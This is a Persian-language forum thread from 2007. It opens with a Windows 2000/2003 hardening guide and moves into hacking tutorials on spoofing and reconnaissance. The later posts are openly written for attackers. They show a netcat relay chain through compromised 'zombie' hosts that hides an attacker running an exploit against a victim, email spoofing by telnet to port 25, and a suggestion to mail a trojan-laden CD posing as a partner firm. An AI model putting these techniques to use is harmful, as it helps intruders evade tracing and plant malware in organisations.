تعيين استراتژي مربوط به اعتبار سنجي كاربران ، يكي از مهمترين مراحل روند ايمن سازي سيستم عامل مي باشد . سيستم عامل Windows 2000 & Server 2003 از پروتكلهاي اعتبار سنجي LM , NTLM v1 , NTLM v2 و Kerberos پشتيباني مي كنند . پروتكل پيش فرض Kerberos هست كه نسبت به پروتكلهاي ديگه ايمن تر مي باشد . بنابرين موضوع پر اهميت در بخش اعتبار سنجي ، كنترل سياستهاي مربوط به حسابهاي كاربري و كلمات عبور مي باشد .


قدم اول : ساخت سياستي قدرتمند در استفاده از كلمات عبور

آيتمهايي كه در اين قسمت تنظيم مي شوند به شرح ذيل هستند :



Maximum password age : 30 days

Enforce Password History : 42 passwords rememberd

Minimum password age : 0 day

Minimum password length : 8 characters

Password must meet complexity requriments : Enable

در اين بخش همچنين بايد به كاربران آموزش داده شود كه كلمات عبور خود را به صورت ياد داشت در محل كار خود قرار ندهند .

قدم دوم : ساخت سياستي قدرتمند در استفاده از حسابهاي كاربري

در اين مرحله ، چند تنظيم براي حسابهاي كاربري به شكل زيرانجام مي دهيم :



Account lockout threshold : 3 attempts

Account lockout duration : 0

Reset account lockout counter after : 30 minutes

قدم سوم : كنترل دسترسي ها و مجوزها

اين بخش ، يكي از حساس ترين مراحل ايمن سازي سيستم عامل مي باشد . شرايط با توجه به استفاده از Active Directory يا عدم استفاده از Domain متفاوت مي باشد . براي اجراي دقيق دسترسي ها و اعمال صحيح مجوزها ، درك صحيح و درست از مجوزهاي استاندارد و خاص و موارد استفاده از آنها ، و همچنين مجوزهاي منابع به اشتراك گذاشته شده ، لازم و ضروري هست .
به طور كل ، مسئله اي كه خيلي مهم هست و بايد قبل از اعمال هر گونه مجوزي در نظر گرفته شود ، ايجاد يك گروه بندي مناسب و صحيح بر اساس نيازهاي سازمان ، شبكه و كاربران مي باشد . اگر اين گروه بندي ها به صورت صحيح ايجاد و مديريت شوند ، اعمال دسترسي ها و مجوزها ، بسيار راحت و تحت كنترل خواهد بود .

Group Policy Management Console امكان مديريت GPO را فراهم نموده است .
هميشه به ياد داشته باشيد كه مجوزها را به گونه اي اعمال نماييد كه نياز كاربران مرتفع شود و بيشتر از آنچه كه نياز هست ، دسترسي داده نشود .

همچنين استفاده از Security Templates در ايجاد سطوح مختلف امنيتي بر اساس نياز ، مي تواند امر ايمن سازي را تسريع و كنترل نمايد . انواع Security Templates ها و موارد كاربرد آنها به شرح ذيل مي باشند :

Security.inf
الگوي فوق ، الگوي پيش فرض در هنگام نصب مي باشد .

Compatws.inf
اين الگو ، كاربران گروه Power Users را حذف كرده و يك سطح امنيتي پيش فرض با محدوديت كمتر براي كاربران گروه Users ايجاد مي كند .

Securews.inf and Securedc.inf
اين الگو ، سطح امنيتي بيشتري با اعمال تنظيمات در بخشهاي Account Policy , Auditing و Registry Key بوجود مي آورد . اين الگو همچنين ، تمامي كاربران عضو گروه Power Users را در windows xp ، حذف مي نمايد .

Hisecws.inf and Hisecdc.inf
اين الگو ، سطح بالايي از امنيت را در ارتباطات شبكه اي بوجود مي آورد .

Rootsec.inf
اين الگو ،مجوزهاي پيش فرض را براي شاخه اصلي سيستم عامل و زير شاخه هاي آن ، به شرطي كه قبلاً به صورت مشخص مجوز براي آنها تنظيم نشده باشد ، را تنظيم مي نمايد .
Iesacls.inf
اين الگو ، براي فعال سازي تنظيمات registery جهت كنترل امنيت internet explorer به كار گرفته مي شود . اين الگو امنيت IE را افزايش نمي دهد ، بلكه نقطه شروعي براي آغاز ايمن سازي IE مي باشد .

علاوه بر الگوهاي فوق ، سيستم عامل اين امكان را فراهم نموده كه الگوهاي جديد بر اساس نيازها ساخته شود يا الگوهاي فوق تغيير داده شوند .

قدم چهارم : به روز رساني و نصب وصله هاي امنيتي

بدون شك ، به روز رساني و نصب آخرين وصله هاي امنيتي يكي از مراحل بسيار مهم در فرايند ايمن سازي سيستم عامل مي باشد . به روز رساني سيستم عامل به تنهايي ، از طريق Automatic Update ، بهترين روش براي به روز رساني مي باشد .
اما به روز رساني در شبكه و در سطوح گسترده ، احتياج به تعيين استراتژي و بهرگيري از نرم افزارهايي همچون SUS يا SMS را دارد .

قدم پنجم : ايمن سازي دسترسي راه دور

چنانچه احتياج به دسترسي راه دور باشد ، اين بخش بايد با دقت و وسواس زياد ، بر روي سرور راه دور و همچنين در صورت لزوم ، بر سرويس گيرنده هاي راه دور اعمال شوند . در اين بخش ، دو قسمت بايد مورد توجه قرار گيرد . ابتدا انتخاب پروتكل مناسب و ايمن براي احراز هويت سرويس گيرنده و در قسمت دوم انتخاب يك پروتكل ايمن ارتباطي براي برقراري ارتباط مطمئن و ايمن شده بين سرويس گيرنده و سرويس دهنده مي باشد .

قدم ششم : ايمن سازي منابع داخلي

در اين بخش بايد اطلاعات حساس بر روي سيستم عامل ، توسط EFS‌ رمزنگاري و به خوبي محافظت شوند .


بخش دوم : مستحكم سازي سيستم عامل

در اين قسمت ، بايد مراحل تكميلي و مستحكم سازي سيستم عامل انجام شود . اهميت انجام صحيح و دقيق اين بخش فوق العاده زياد است . مستحكم سازي سيستم عامل شامل مراحلي هست كه اين مراحل به شرح ذيل هستند :

قدم هفتم : متوقف كردن سرويسهاي غير مورد نياز

معمولاً هنگام نصب سيستم عامل ، سرويسهايي نصب مي شود . چنانچه به اين سرويسها احتياج نداريد ، بايد حتماً غير فعال شوند .

قدم هشتم : ايمن كردن فايلهاي اجرايي خاص

گروهي از فايلهاي اجرايي بر روي سيستم عامل ، بايد حتماً با مجوزهاي صحيح ، فقط براي مدير سيستم قابل اجرا باشند . مهمترين اين فايلها عبارتند از :



arp.exe – at.exe – attrib.exe – cacls.exe – cmd.exe – command.com – debug.exe – dialer.exe – edit.com – finger.exe – ftp.exe – ipconfig.exe – nbtstat.exe – net.exe – netstat.exe –nslookup.exe – ping.exe – rcp.exe –rdisk.exe – regedit.exe – regedt32.exe – rexec.exe – route.exe – rsh.exe –runonce.exe – sysedit.exe – telnet.exe – tftp.exe – tracert.exe – xcopy.exe

با مجوز گزاري صحيح بر روي اين فايلها ،بسياري از حملات راه دور با شكست مواجه خواهد شد .

قدم نهم : غير فعال كردن Subsystems

در صورت عدم نياز به پشتيباني از سيستم عاملهاي ديگر مانند Netware و OS/2 و... ، سرويسهاي پشتيباني از اين سيستم عاملها را غير فعال نماييد .


قدم دهم : فعال سازي سيستم بازرسي و كنترل

سيستم Auditing و Logging ‌ در سيستم عامل بايد به درستي راه اندازي و تنظيم شود . بخشهايي كه بايد Auditing بر روي آن تنظيم شود عبارتند از Active Directory ، Registery و Login . همچنين Event Viewer هم بايد براي كنترل و بازرسي رويدادها به درستي تنظيم و فعال شود .

قدم يازدهم : ايمن سازي در پروتكل TCP/IP

پروتكل tcp/ip داراي نقاط ضعفي مي باشد كه امكان اجراي حملاتي بر روي اين پروتكل و متوقف كردن سرويس دهي سيستم عامل فراهم مي شود . براي جلوگيري از بروز چنين مشكلاتي بايد تنظيماتي در رجيستري براي استحكام بخشيدن به ساختار ارتباطي انجام شود .

قدم دوازدهم : كنترل سطح ايمني

در اين مرحله ، با استفاده از نرم افزارهايي مانند MSBA و يا نرم افزارهاي شركت هاي ثالث به عنوان Vulnerability Scanner سطح ايمني سيستم و شبكه را كنترل نموده و چنانچه نقطه ضعفي گزارش گرديد ، اقدام به رفع مشكل مي نماييم .


بخش سوم : امنيت بيشتر با حركت به سوي شبكه هاي Trust

چنانچه سازمان و شبكه اي احتياج به امنيت در حد بسيار بالايي داشته باشد ، چاره اي جزء حركت به سوي ايجاد شبكه هاي Trust ندارد . در اين گونه شبكه ها ، تكنولوژي هاي پيشرفته از جمله استفاده از كارتهاي هوشمند ، گواهينامه ها و امضاهاي ديجيتال و پروتكلهاي ارتباطي رمز شده ، به كار گرفته مي شود .
راه اندازي شبكه هاي Trust بر روي سكوي ويندوز مبحثي جدا مي باشد كه در انجمن Windows Trusted Network ‌ مورد بررسي قرار خواهد گرفت .


موفق باشيد
ايمن افزا سيستم
مهدي قاسمي

pastoo
09-11-2007, 01:23
در این مقاله به تکنیکهای جعل هویت یا Spoof و انواع آن می پردازیم و تکنیکهای مختلف را در این زمینه بررسی می نماییم .

اصولاً هنگامی که قصد داریم هویت اصلی ما پنهان بماند ، از spoof استفاده می کنیم. و البته هر حمله ای که حرفه ای باشد و امکان ردگیری آن وجود داشته باشد ، باید از spoof استفاده نماید .

Spoof کردن در بعضی موارد بسیار ساده می باشد ، اما در مواردی که احتیاج به داشتن یک ارتباط دو طرفه بین هدف و spoof کننده باشد ، روشها بسیار سخت و حرفه ای می شوند .

انواع Spoof

MAC Address Spoofing

یکی از ساده ترین انواع spoof کردن می باشد . اگرچه آدرس MAC یک آدرس فیزیکی است و به سخت افزار تعلق می گیرد ، اما بوسیله ی نرم افزار می توان این آدرس را تغییر داد . برای تغییر آدرس MAC در ویندوز از نرم افزار SMAC و در لینوکس از نرم افزار MAC Changer می توان استفاده نمود .

IP Address Spoofing

یکی از اصلی ترین مباحث spoof در این بخش مطرح می شود و به علت اهمیت آن، روشها و ابزارهای متنوعی در این بخش به وجود آمده است . مباحث مربوط به جعل آدرس IP در مورد شبکه هایی که از NAT استفاده می کنند ، مصداق پیدا نمی کند .
بنابرین اگر آدرس کامپیوتر شما یکی از آدرسهای Private در کلاسهای مختلف می باشد ، از این بخش نمی توانید استفاده نمایید . البته این گفته می شود، نمی توانید ، به این معنا می باشد که چون در حالت استفاده از NAT ، آدرس IP دروازه اینترنتی( Internet Gateway ) شما در اینترنت برای مسیر یابی استفاده می شود، بنابرین رد گیری شما کار مشکلی نخواهد بود و spoof کردن سودی نخواهد داشت .

نکته ی اصلی در IP Spoofing کاربرد آن می باشد . اگر ما آدرس IP خود را تغییر دهیم ، ارتباط ما با هدف یک طرفه خواهد شد و دیگر نمی توانیم پاسخ بسته های ارسالهای خود را داشته باشیم . این گونه تغییر آدرس ها ، برای حملات DoS که احتیاجی به داشتن تعامل با هدف ندارند ، بسیار مناسب می باشد . اما اگر احتیاج به داشتن ارتباط با هدف باشد ، چه باید کرد ؟
وقتی هدف رد گیری نشدن باشد ، یا پیچیده کردن ردگیری ، روشهای مختلفی قابل اجرا می باشند . نرم افزار NMAP یک گزینه دارد به نام Decoy که با انتخاب آن ، هنگام scan کردن هدف ، بسته های جعلی با آدرس های مبداء متفاوت به همراه بسته ی اصلی ارسال می شوند و این امر باعث می شود که در سیستم هدف آدرسهای مبداء زیادی ثبت شود که در بین آنها پیدا کردن آدرس اصلی متعلق به هکر بسیار سخت می باشد .
روش دیگر که بسیار متداول می باشد ، استفاده از سیستم های هک شده در نقاط جغرافیایی مختلف برای حمله به هدف هست . استفاده از این روش نیز شناسایی مهاجم را مشکل می نماید . همچنین نرم افزار Netcat این امکان را به ما می دهد که بتوانیم ارتباطات رله شده بر روی سیستم های مختلف را ایجاد نماییم . برای این کار باید به شکل زیر عمل نماییم . این تکنیک رد گیری مهاجم را بسیار مشکل می کند .



کد:


Hacker =213.218.15.1
nc -l -p 4444

Zombie1 = 206.185.6.2
nc –l –p 4445 –vv | nc 213.218.15.1 -p 4444

Zombie2 = 204.22.55.60
nc –l –p 4446 –vv | nc 206.185.6.2 -p 4445

Zombie3 = 210.16.88.66
nc –l –p 4447 –vv | nc 204.22.55.60 -p 4446

victim =80.120.99.15
exploit.exe 80.120.99.15 80 210.16.88.66 4447



روش دیگر که یک حقه ی قدیمی و سخت می باشد ، استفاده از تکنیکی به نام Source Routing است. می دانیم که مسیریابی در شبکه بر اساس Destination Address می باشد . در اینترنت که ماهیتی پویا دارد ، یک بسته ارسالی می تواند از مسیرهای متفاوتی برای رسیدن به مقصد استفاده نماید و در هنگام برگشت هم از مسیرهای متفاوتی استفاده می شود . اما Source Routing این امکان را به ما می دهد که یک مسیر خاص را برای انتقال مشخص نماییم . این امکان در پروتکل tcp/ip برای رفع مشکلات خطوط انتقال اطلاعات گنجانده شده است .
TCP/IP دو نوع Source Routing را در اختیار می گذارد . نوع اول Loose Source Routing یا LSR و نوع دوم Strict Source Routing یا SSR نامیده می شود . در LSR چند آدرس IP که مورد نظر هست را مشخص می کنیم و بقیه مسیر را در اختیار شبکه قرار می دهیم اما در SSR مسیر را از ابتدا تا انتها مشخص می کنیم . در هدر IP ، مقدار 39 بایت برای Source Routing در نظر گرفته شده است که با این مقدار 9 آدرس را می توان مشخص نمود . از این 9 آدرس ، یک آدرس مربوط به آدرس مقصد است و 8 آدرس دیگر برای مشخص نمودن مسیر می باشد . با توجه به اینکه استفاده ی ما از این روش برای Spoof کردن در اینترنت می باشد ، مقدار 8 آدرس بسیار کم می باشد ، بنابرین مجبوریم که از LSR استفاده نماییم .
در این حالت ، هکر packet های ارسالی را با یک آدرس مبداء جعلی ارسال می کند ، اما Source Routing را طوری تنظیم می نماید که مسیر ارسال و بازگشت این packet از سیستم وی عبور نماید و بدین صورت خود را در مسیر عبور اطلاعات قرار می دهد . موفقیت این روش به پیکربندی روتر های مشخص شده در مسیر دارد . چون میتوان روتر ها را طوری پیکربندی نمود که Source Routing را پشتیبانی نکنند . ضمن اینکه در فایروالها به صورت پیش فرض Source Routing غیر فعال می باشد .

Email Spoofing

Email Spoofing به دو منظور مورد استفاده قرار می گیرد . مورد اول وقتی می باشد که مهاجم قصد دارد ایمیلی ارسال کند ، بدون اینکه هیچ نشانی از وی در دسترس باشد . برای اینکار وی از Anonymous Remailer استفاده می نماید . در این روش مهاجم ایمیلی را برای این Remailer ارسال نموده و سپس Remailer ایمیل را برای گیرنده ارسال می نماید .
مورد دوم زمانی می باشد که مهاجم قصد دارد خود را جای شخص دیگری معرفی نماید . برای انجام اینکار 3 راه وجود دارد :

اول : استفاده از ایمیلهای شبیه هم , هست . مطمئنم که شما نمونه های زیادی از آن را دیده اید .

دوم : ایجاد تغییر در email client برای وانمود نمودن اینکه ایمیل از طرف شخص خاصی آمده است .

سوم : telnet کردن به پورت 25


Web Spoofing

از این تکنیک هم معمولاً برای دو منظور استفاده می شود . اول برای ناشناس ماندن مهاجم در اینترنت و وب ، که در این حالت استفاده از Internet ***** بسیار متداول می باشد .
استفاده ی دیگر در زمانی هست که مهاجم قصد دارد که هویت شخص یا سایتی را جعل نماید . معمولاً مهاجمین برای جعل سایت خود ، از Fake Page استفاده می نمایند . برای جعل هویت در سایتهایی مانند بانکها و فروشگاه های الکترونیکی ، معمولاً از Cookie ها استفاده می شود . روش دیگر برای اینکار حدس زدن Session ID های مربوط به یک سایت می باشد .

DNS Spoofing

در این روش مهاجم پاسخ درخواست یك client برای یافتن آدرس یك دامنه را , تغییر می دهد تا client به سمت ماشینی كه مهاجم می خواهد منحرف شود . به یك نمونه از این نوع حملات را در این post (http://www.imenafza.net/showthread.php?p=40#post40)اشاره شده است .

Non-Technical Spoofing

این بخش همان مهندسی اجتماعی و مهندسی معكوس می باشد كه بعضی وقتها بهترین انتخاب است .



جمع بندی :

اگر قصد ping یا trace کردن هدف را داشته باشیم ، بهتر است از Source Routing استفاده کنیم .
اگر قصد scan کردن را داشته باشیم ، بهتر است از decoy استفاده کنیم .
اگر قصد استفاده از وب برای حمله را داریم , از ***** استفاده نماییم .
اگر قصد گرفتن دسترسی بر روی هدف مهمی را داریم , حتماً حداقل با یك واسطه اینكار را انجام دهیم .
برای فرستادن ایمیل , از telnet به پورت 25 استفاده نماییم .

pastoo
16-12-2007, 01:14
بنام خدا

به امید خدا , قصد داریم كه آموزشهای هك رو از ابتدا تا اونجایی كه بلد هستیم , به صورت طبقه بندی شده و كاربردی ارائه بدیم . اگرچه فكر میكنم كه تكمیل این مجموعه چندین ماه طول بكشه , اما مطمئنم كه یك مجموعه ی خوب و ارزشمند , و بومی شده برای ایرانی های عزیز , خواهیم داشت .

دوستان و علاقمندانی كه تمایل دارند كه دانش و تجربیات خودشون رو در این مورد در اختیار بذارن , میتونند بر اساس همین طبقه بندی , در تكمیل آموزشها با دوستانشون همكاری كنند .

و اما :

قبل از شروع هر حمله ي هدفمند ، لازم هست كه يك سري اطلاعات پايه نسبت به هدف بدست بياريم . معمولاً سازمانها ، يا به طور كل اهداف موجود در اينترنت يا شبكه هاي محلي ، بر اساس سطح مهارت و توانايي هاشون ، يك سري پروسه ها انجام ميدن تا خودشون رو ايمن كنند ،‌اما معمولاً فراموش ميكنند كه با همه ي كارهايي كه انجام دادند ، باز هم اطلاعات خيلي مهمي وجود داره كه مورد علاقه ي هكرها هست و به راحتي در دسترس هست . در ميون هكرهاي حرفه اي اين جمله معروف هست كه :

" اگر يك مهاجم مراحل شناسايي و بدست آوردن اطلاعات در مورد هدف رو به درستي انجام بده ، و به اندازه ي كافي در جزييات اطلاعات بدست اومده ، تمركز و دقت كنه ، نفوذ و گرفتن دسترسي روي هدف ، تضمين شده هست . "

از ديد امنيتي ، اين بخش خيلي مهم ميتونه باشه ، چون اگر ما بدونيم كه معمولاً چه نوع اطلاعاتي براي هكرها جالب توجه هست ، ميتونيم تا اونجا كه ممكن هست از انتشار اين اطلاعات جلوگيري كنيم .

مراحل جمع آوري اطلاعات

به طور كلي ، جمع آوري اطلاعات در 7 مرحله قابل اجرا هست . اين كه ميگيم 7 مرحله ، به اين معني نيست كه بايد از مرحله يك شروع بشه و هفت مرحله به ترتيب اجرا بشه . اين جور طبقه بندي ها ، در علم هك ، معمولاً جهت نظم دادن و ايجاد يك روال منطقي در آموزش و يادگيري به وجود اومده ، وگرنه در عمل ممكنه همه ي اين مراحل در يك حركت انجام بشه . چون هدف اين سايت ارائه مطالب هم به صورت علمي و هم كاربردي هست ، اينجور طبقه بندي ها مورد بحث قرار ميگيره .

در تست هاي امنيتي يا pen test‌ ها ، يك حالت وجود داره كه به اون Black Box ميگن . در اين حالت ، شخصي كه تست رو انجام ميده ، هيچ اطلاعاتي در مورد هدف نداره ، جزء يك اسم . در اين حالت كه سخت ترين حالت تست هست ، مرحله ي جمع آوري اطلاعات خيلي مهم و مرحله به مرحله انجام ميشه .

مرحله ي اول : Initial Information يا اطلاعات اوليه

حداقل اطلاعاتي كه براي شروع يك حمله احتياج هست رو Initial Information ميگند . اين اطلاعات حداقل ، شامل يك آدرس IP يا يك اسم دامنه هست .

يك نكته كه براي خيلي از افرادي كه وارد يادگيري دوره هاي هك ميشن ايجاد مشكل ميكنه اينه كه ، اين مراحل هك كه در مقالات ، كتابها و سايتها مطرح ميشه ، اصولاً براي هك كردن شبكه ها يا سازمانهايي هست كه داراي Server يا سايت هستند . اين روشها ، در بعضي مراحل ، براي هك كردن كاربران خانگي يا سيستم هايي كه سرويس دهنده نيستند ، مصداق پيدا نمي كنه . اگر چه من فكر ميكنم كه بحث هك Server يا Client يك بحث مطرح شده توسط ايراني ها هست ، اما به نظر من به جاي خودش بحث مهمي هست ، و فكر ميكنم كه اصولاً كسي كه هك رو به صورت درست و اصولي ياد بگيره ، به راحتي ميتونه روي هر دو مبحث كار كنه . بنابرين در حال حاضر بحث ما روي client ها نيست .

وقتي فقط يك اسم داريم ، شروع كار براي بدست آوردن اطلاعات اوليه ، جستجو در اينترنت هست . با جستجو در اينترنت و استفاده از توانايي هاي دكتر گوگل ، و البته به خرج دادن كمي ابتكار در نحوه ي جستجو ، آدرس سايت شركت مورد نظر بدست مياد . نكته اي كه اينجا مطرح هست ، هدف ما از هك كردن هست . اگر هدف تنها تغيير چهره ي سايت (Deface) يا نفوذ از طريق Web Application ها باشه ، بدست آوردن آدرس سايت ، پايان اين مرحله خواهد بود . نكته اي كه اين جا وجود داره اينه كه خيلي از سازمانها و شركتها ، براي ارائه سرويسهاي تحت وب خودشون ، سرور اختصاصي ندارند و از امكانات ميزباني استفاده ميكنند . بنابرين در اين موارد و در حالتي كه هدف ما نفوذ به شبكه داخلي ، يا سرورهاي داخلي يك سازمان هست ، آدرس وب سايت و آدرس IP متعلق به وب سرور ، به معني بدست آوردن اطلاعات اوليه لازم براي اون هدف خاص نيست . در اينجور موارد ، مطالعه دقيق محتواي سايت خيلي راه گشا خواهد بود . فقط مهم اين هست كه شخصي كه محتواي سايت رو مطالعه ميكنه ، روي تكنيكهاي متنوع هك تسلط كافي و همچنين قدرت ابداع تاكتيك ( تركيب تكنيكها ) رو داشته باشه . يعني بدونه كه دنبال چي ميگرده و چه اطلاعاتي ميتونه بدرد بخور باشه . قطعاً شخصي كه در هك مبتدي هست و تكنيكها رو به خوبي نشناخته ، نمي تونه نكته ي جالب توجهي از محتواي يك سايت بدست بياره .

بنابرين بر اساس هدف از هك كردن ، 2 تا مسير در بدست آوردن Initial Information ايجاد ميشه :

1 – مسير اول :
هدف : Deface يا نفوذ از طريق Web Application
مراحل : پيدا كردن آدرس وب سايت هدف ، پيدا كردن آدرس IP سرور ميزبان سايت مورد نظر با استفاده از دستور ping ( با توجه به توانايي هاي ابزارهاي scan‌ موجود ، احتياجي به ping نيست و آدرس وب سايت كافي هست ) . رفتن به مرحله Scan يا پويش براي بدست آوردن باگهاي امنيتي

شكست : در صورت عدم موفقيت در رسيدن به هدف ، برگشت به مرحله جمع آوري اطلاعات و ادامه ساير مراحل جمع آوری اطلاعات

2 – مسير دوم :
هدف : نفوذ به شبكه ي داخلي يك سازمان
مراحل : پيدا كردن آدرس وب سايت هدف ، بررسي محتواي وب سايت جهت جمع آوري مفيد
اين مرحله ، برخلاف بي توجهي ، بسيار مهم و كارآمد ميتونه باشه . بنابرين شرح بيشتري روي مراحل اين مسير ميدم . يك سري اطلاعات در يك سايت يا در كل محتواي اينترنت موجود هست كه اصطلاحاً به اونها Open Source Information‌ ميگن. اين نوع اطلاعات ، اطلاعاتي هستند كه هر شخصي ميتونه به اونها دسترسي داشته باشه و بدست آوردن و آناليز اونها ، منع قانوني نداره . به همين علت ، صاحبين اين اطلاعات ، بدون واهمه و اهميت دادن ، اين اطلاعات رو در اختيار عموم ميزارن . البته در بعضي موارد ، چاره اي جزء اين نيست . در زير بعضي از اينگونه اطلاعات و كاربردهاي اونها رو شرح ميدم . دقت كنيد كه ما هنوز در مرحله Initial Information هستيم و فقط يك آدرس وب سايت داريم . يكي از اطلاعات مهم ، شماره تلفن ، يا تلفن هاي اون سازمان هست . مورد استفاده ي اون هم در مهندسي اجتماعي و يا war dialing هست . ( جزييات استفاده از هر تكنيك رو در مراحل مربوط به اون تكنيك توضيح خواهم داد )
مورد بعد ، محل فيزيكي يا location هدف هست . اين مورد هم در مهندسي اجتماعي مورد كاربرد داره . بعضي از سايتها ، اطلاعاتي در مورد بعضي از پرسنل در اختيار ميذارن . اين اطلاعات شامل اسم ، عنوان شغلي ، ميزان تحصيلات و به احتمال زياد ، آدرس ايميل اون شخص هست . همه ي اين اطلاعات ميتونند در تكنيكهاي تركيبي كه معمولاً با مهندسي اجتماعي شروع ميشن ، مورد استفاده قرار بگيره .

بعضي وقتها ، البته به ندرت ، ديده شده كه بعضي از سازمانها ، از داخل وب سايتشون يك لينك به يكي از سرورهاي داخليشون ، كه معمولاً Interanet Web Server هست ، قرار ميدن ، كه خيلي از كارها رو براي يك هكر راحت ميكنه . معمولاً اينجور لينكها شامل يك IP Address هست كه دقيقاً همون چيزي هست كه دنبالش بوديم .

يكي ديگه از مواردي كه بايد مورد بررسي قرار بگيره ، شركتها و سازمانهايي هست كه با سازمان هدف داراي ارتباط تجاري يا خدماتي هستند . ممكنه اسامي و لينك اين سايتها در وب سايت هدف موجود باشه و اگر موجود نباشه ، با يك جستجو در گوگل به شكل :link و به دنبالش آدرس سايت هدف ، آدرس تمام سايتهايي كه به سايت هدف لينك دارند ، قابل شناسايي هست . به دست آوردن اطلاعات مربوط به اين شركتهاي مرتبط به هدف ، در اجراي تكنيكهاي مهندسي اجتماعي ، خيلي ميتونه مفيد باشه . كافيه كه شما يك CD آلوده به يك تروجان يا هر Spyware كه قابليت نصب اتوماتيك رو داشته باشه ، از آدرس شركت A كه با شركت B كه هدف شما هست ، ارتباط كاري داره ، ارسال كنيد و اميدوار باشيد كه يك نفر در شركت B ، اين CD آلوده رو استفاده كنه .
به هر صورت تكنيك هايي كه همراه با مهندسي اجتماعي هست ، هميشه با ريسك عدم موفقيت همراه هست .

يكي ديگه از نكاتي كه بايد در اين مرحله مورد توجه قرار بگيره ، اينه كه در يك وب سايت ، ما به صفحاتي كه داراي لينك در اون سايت هستند ، دسترسي داريم ، اما ممكن هست صفحات يا فايل هاي ديگه اي روي فضاي مربوط به اون سايت موجود باشه كه لينكي نداشته باشه . اين صفحات يا فايلها معمولاً داراي اطلاعات با ارزشي هستند . گاهي اوقات با حدس زدن نام اين صفحات و فايلها ميشه به محتواي اونها دسترسي پيدا كرد .

قدم بعدي در اين مرحله ، استفاده از whois براي بدست آوردن اطلاعاتي در رابطه با سايت هست . اين اطلاعات در بعضي از موارد شايد راه گشا باشه . بنابرين بدست آوردن اين اطلاعات ، ضرري نداره . معمولاً براي whois گرفتن از دامنه هاي com و net علاوه بر نرم افزار SamSpade ، از سايتهاي whois ‌ هم ميشه استفاده كرد . براي دامنه هاي ir هم از سايت whois.nic.ir ميشه استفاده كرد . در صفحه اطلاعات مربوط به whois ، آدرس DNS‌ ها خيلي مهم هست . معمولاً آدرس Name Server ها ، در انتهاي صفحات whois نمايش داده ميشه .

ادامه دارد ...

pastoo
24-12-2007, 00:47
بحث تا جايي ادامه پيدا كرد كه ما با استفاده از whois ، اطلاعاتي در مورد سايت بدست آورديم . در ايران ، چون صاحبين سايتها ، امكان ثبت مستقيم دامنه ي مورد نظر خودشون رو ندارند ، اين كار رو به عهده ي يك سري از شركتها ميسپرند ، و معمولاً اطلاعات داخل بانك اطلاعاتي دامنه ها ، اطلاعات شركت ثبت كننده هست ، نه اطلاعات صاحب سايت . ( بعضي از اين فيلدها قابل تغيير هستند ، اما خيلي ها اون رو تغيير نميدند ) . اما گفتيم كه در بين اطلاعاتي كه از whois بدست مياد ، آدرس DNS ها خيلي مهم هستند . بنابرين قبل از اينكه مراحل بعدي جمع آوري اطلاعات رو ادامه بديم ، در اين مقاله بر روي DNS ها مكث مي كنيم .

چرا DNS مهم هست ؟ DNS يكي از كامپونت هاي اصلي اينترنت هست . پس هر جا كه اينترنت هست ، DNS هم هست . مايكروسافت DNS رو يكي از كامپونت هاي اصلي AD قرار داده و اين نشون دهنده ي اهميت اين سرويس هست . از نظر ما ، اين سرويس به خاطر اين گستره ي كاربري ، ميتونه جالب باشه . اگر يه سازماني بخواد اجازه دسترسي به اينترنت رو بده ( كه همه اين كار رو ميكنند ) ،بايد اجازه خروج و ورود query هاي DNS رو به شبكه داخلي سازمان بده . و اين ميتونه خيلي معني داشته باشه . پس بهتره كمي DNS ها رو بهتر بشناسيم .

همونطور كه ميدونيد ، وظيفه ي اصلي DNS ها ، ترجمه ي آدرس دامنه ها به آدرس IP هست . سازمان جهاني IANA ( بخوونيد يانا ) ، روي اسمها و آدرسها نظارت داره و اونها رو مديريت ميكنه . DNS ها از يك ساختار سلسله مراتبي استفاده ميكنند . بنابرين بالاترين سطح DNS ها رو Root Level DNS ميگند . شبكه اينترنت وابسته به 13 سرور Root Level هست ، كه اسم ، آدرس و موقعيت اونها رو ميتونيد در آدرس http://www.root-servers.org (http://www.root-servers.org/) ببينيد . اين 13 سرور ، به شدت محافظت ميشند . يعني از نظر فيزيكي ، در حد پايگاه هاي نظامي و از نظر امنيت خود سرورها ، در بالاترين حد قرار دارند . به طوري كه سيستم عامل مورد استفاده در اين سرور ها ، يك نوع خاص از يونيكس هست كه مشابه اون در جاي ديگه وجود نداره . اين مسئله نشون دهنده ي اهميت DNS ها هست . ولي با اين وجود ، و به همين دليل مهم بودن ، تكنيكهاي مختلفي براي سو استفاده از DNS ها وجود داره . قبل از اينكه اين تكنيكها رو شرح بدم ، بايد با روش كار DNS آشنا باشيد . بهترين راه فهميدن نحوه ي كار DNS اين هست كه با يك مثال واقعي اون رو بررسي كنيم . وقتي ما به اينترنت وصل ميشيم ، در حقيقت يك كامپيوتر از يك شبكه داخلي ميشيم كه ISP ارتباط ما رو مديريت ميكنه . در اين حالت ، ما از DNS داخلي ISP استفاده ميكنيم . DNS مثل يك دفترچه راهنماي تلفن ميمونه كه بايد بتونه شماره تلفن هر شخص رو بر اساس نام اون شخص پيدا كنه . واضح هست كه مدير يك ISP محلي در تهران ، نميتونه همه ي شماره تلفن ها يا آدرس IP ها رو براي همه ي نامهاي موجود در اينترنت ، براي DNS خودش تعريف كنه . بنابرين DNS يك ISP محلي ، چيزي نيست جز يك واسطه .اين DNS ها ، فقط تعداد كمي ركورد مربوط به ماشينهاي داخل شبكه خودشون و قابليت cache كردن ركوردها و بعضي اطلاعات رو براي بالا بردن سرعت دارند . اين نوع DNS ها رو Non- authoritative ميگند . وقتي ما در برازر خودمون يك آدرس رو تايپ ميكنيم ، مثل www.imenafza.net (http://www.imenafza.net/) ، برازر درخواست تبديل اين اسم رو به شماره IP ، ميفرسته براي DNS مربوط به ISP ما . حالا اگر قبلاً DNS ما ، چنين درخواستي رو داشته ، و اون رو cache كرده باشه ، شماره ip رو براي ما برميگردونه ، و در غير اين صورت ، درخواست رو براي DNS بالاتر از خودش ميفرسته . اين ارسال درخواست ها به صورت سلسله مراتبي ادامه پيدا ميكنه ، و اگر در هر مرحله درخواست نا موفق بود ، نهايتاً به DNS هاي سطح بالاتر ميرسه كه به اونها authoritative ميگند . اگر اين DNS ها هم نتونند ، ركوردي براي درخواست مورد نظر پيدا كنند ، اون رو براي root ها ميفرستند و اگر باز هم ركوردي پيدا نشد ، نتيجه ميگيريم كه دامنه ي مورد درخواست ما ثبت نشده و وجود نداره . اين يك شماي خيلي ساده شده از روش كار DNS ها بود.

اما مشكلات اين ساختار سلسله مراتبي چي هست ؟ واضح هست كه همه ي مشكلات در همين ارسال و دريافت اطلاعات بين DNS ها نهفته هست .

